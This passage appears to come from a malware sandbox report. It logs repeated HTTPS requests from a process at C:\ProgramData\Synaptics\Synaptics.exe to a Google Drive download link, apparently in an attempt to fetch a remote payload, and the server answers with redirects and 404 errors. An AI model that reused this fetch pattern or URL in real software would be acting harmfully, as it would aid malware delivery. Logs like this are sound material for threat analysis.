                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:13 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:13 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="GN2-Gbst0QGnnJPfZbpi-g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:13 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        20 | 192.168.2.7 | 49907 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        21 | 192.168.2.7 | 49909 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        22 | 192.168.2.7 | 49908 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        23 | 192.168.2.7 | 49910 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:13 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        24 | 192.168.2.7 | 49918 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:14 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-NbtMWeSftqjCA5QkcPyk1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        25 | 192.168.2.7 | 49919 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:14 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:14 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:14 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TtP7R6le9cP-ZUUFiUkulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        26 | 192.168.2.7 | 49931 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fnIKDjr773IT8DBKCcmP-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        27 | 192.168.2.7 | 49932 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        2024-12-30 10:48:15 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-4DqMYHs_Bb34HQZ6rnylxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                        28 | 192.168.2.7 | 49930 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                        2024-12-30 10:48:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:15 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC62hyPrsp0AzqS8cV6Is9su_a3_xs9TRYcq_q7zbIihE7Q1JJqHTWLOE6MBDpfOJokGPiaIXnU
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MY7ZmaKP-8MULA2q5GHt-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:15 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:15 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="BKlp4gK4ypvjCVoFF6xO3Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:15 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 49933 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:15 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:15 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5oznXsDYAgi4dwqWX1p_efBrGnCiXKvyLtFp3svzmC8aqunTLXXhy9gE-TyexzF0so
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:15 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qeOH72AY20mZI-glBLxagQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:15 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:15 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="ej7XNwMIgG56sEutUc64OQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:15 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.7 | 49942 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:16 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
2024-12-30 10:48:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-sW8kGezcKezZMqCMwSXJuQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 49941 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:16 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
2024-12-30 10:48:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ykIv4jqf9tVQcTQNl4-hOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 49943 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:17 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6lG_KZ7i1BNFK9G2cJ81NtjHtiZus-IfaxOlZ36RWO-nOBeYU0xBOCQBXBtziiV6TuRAfywbw
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-63ZV49Spiudd8hbtoKyFGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:17 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:17 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="mbwHNScXWWUX3g1D94dnLw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:17 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
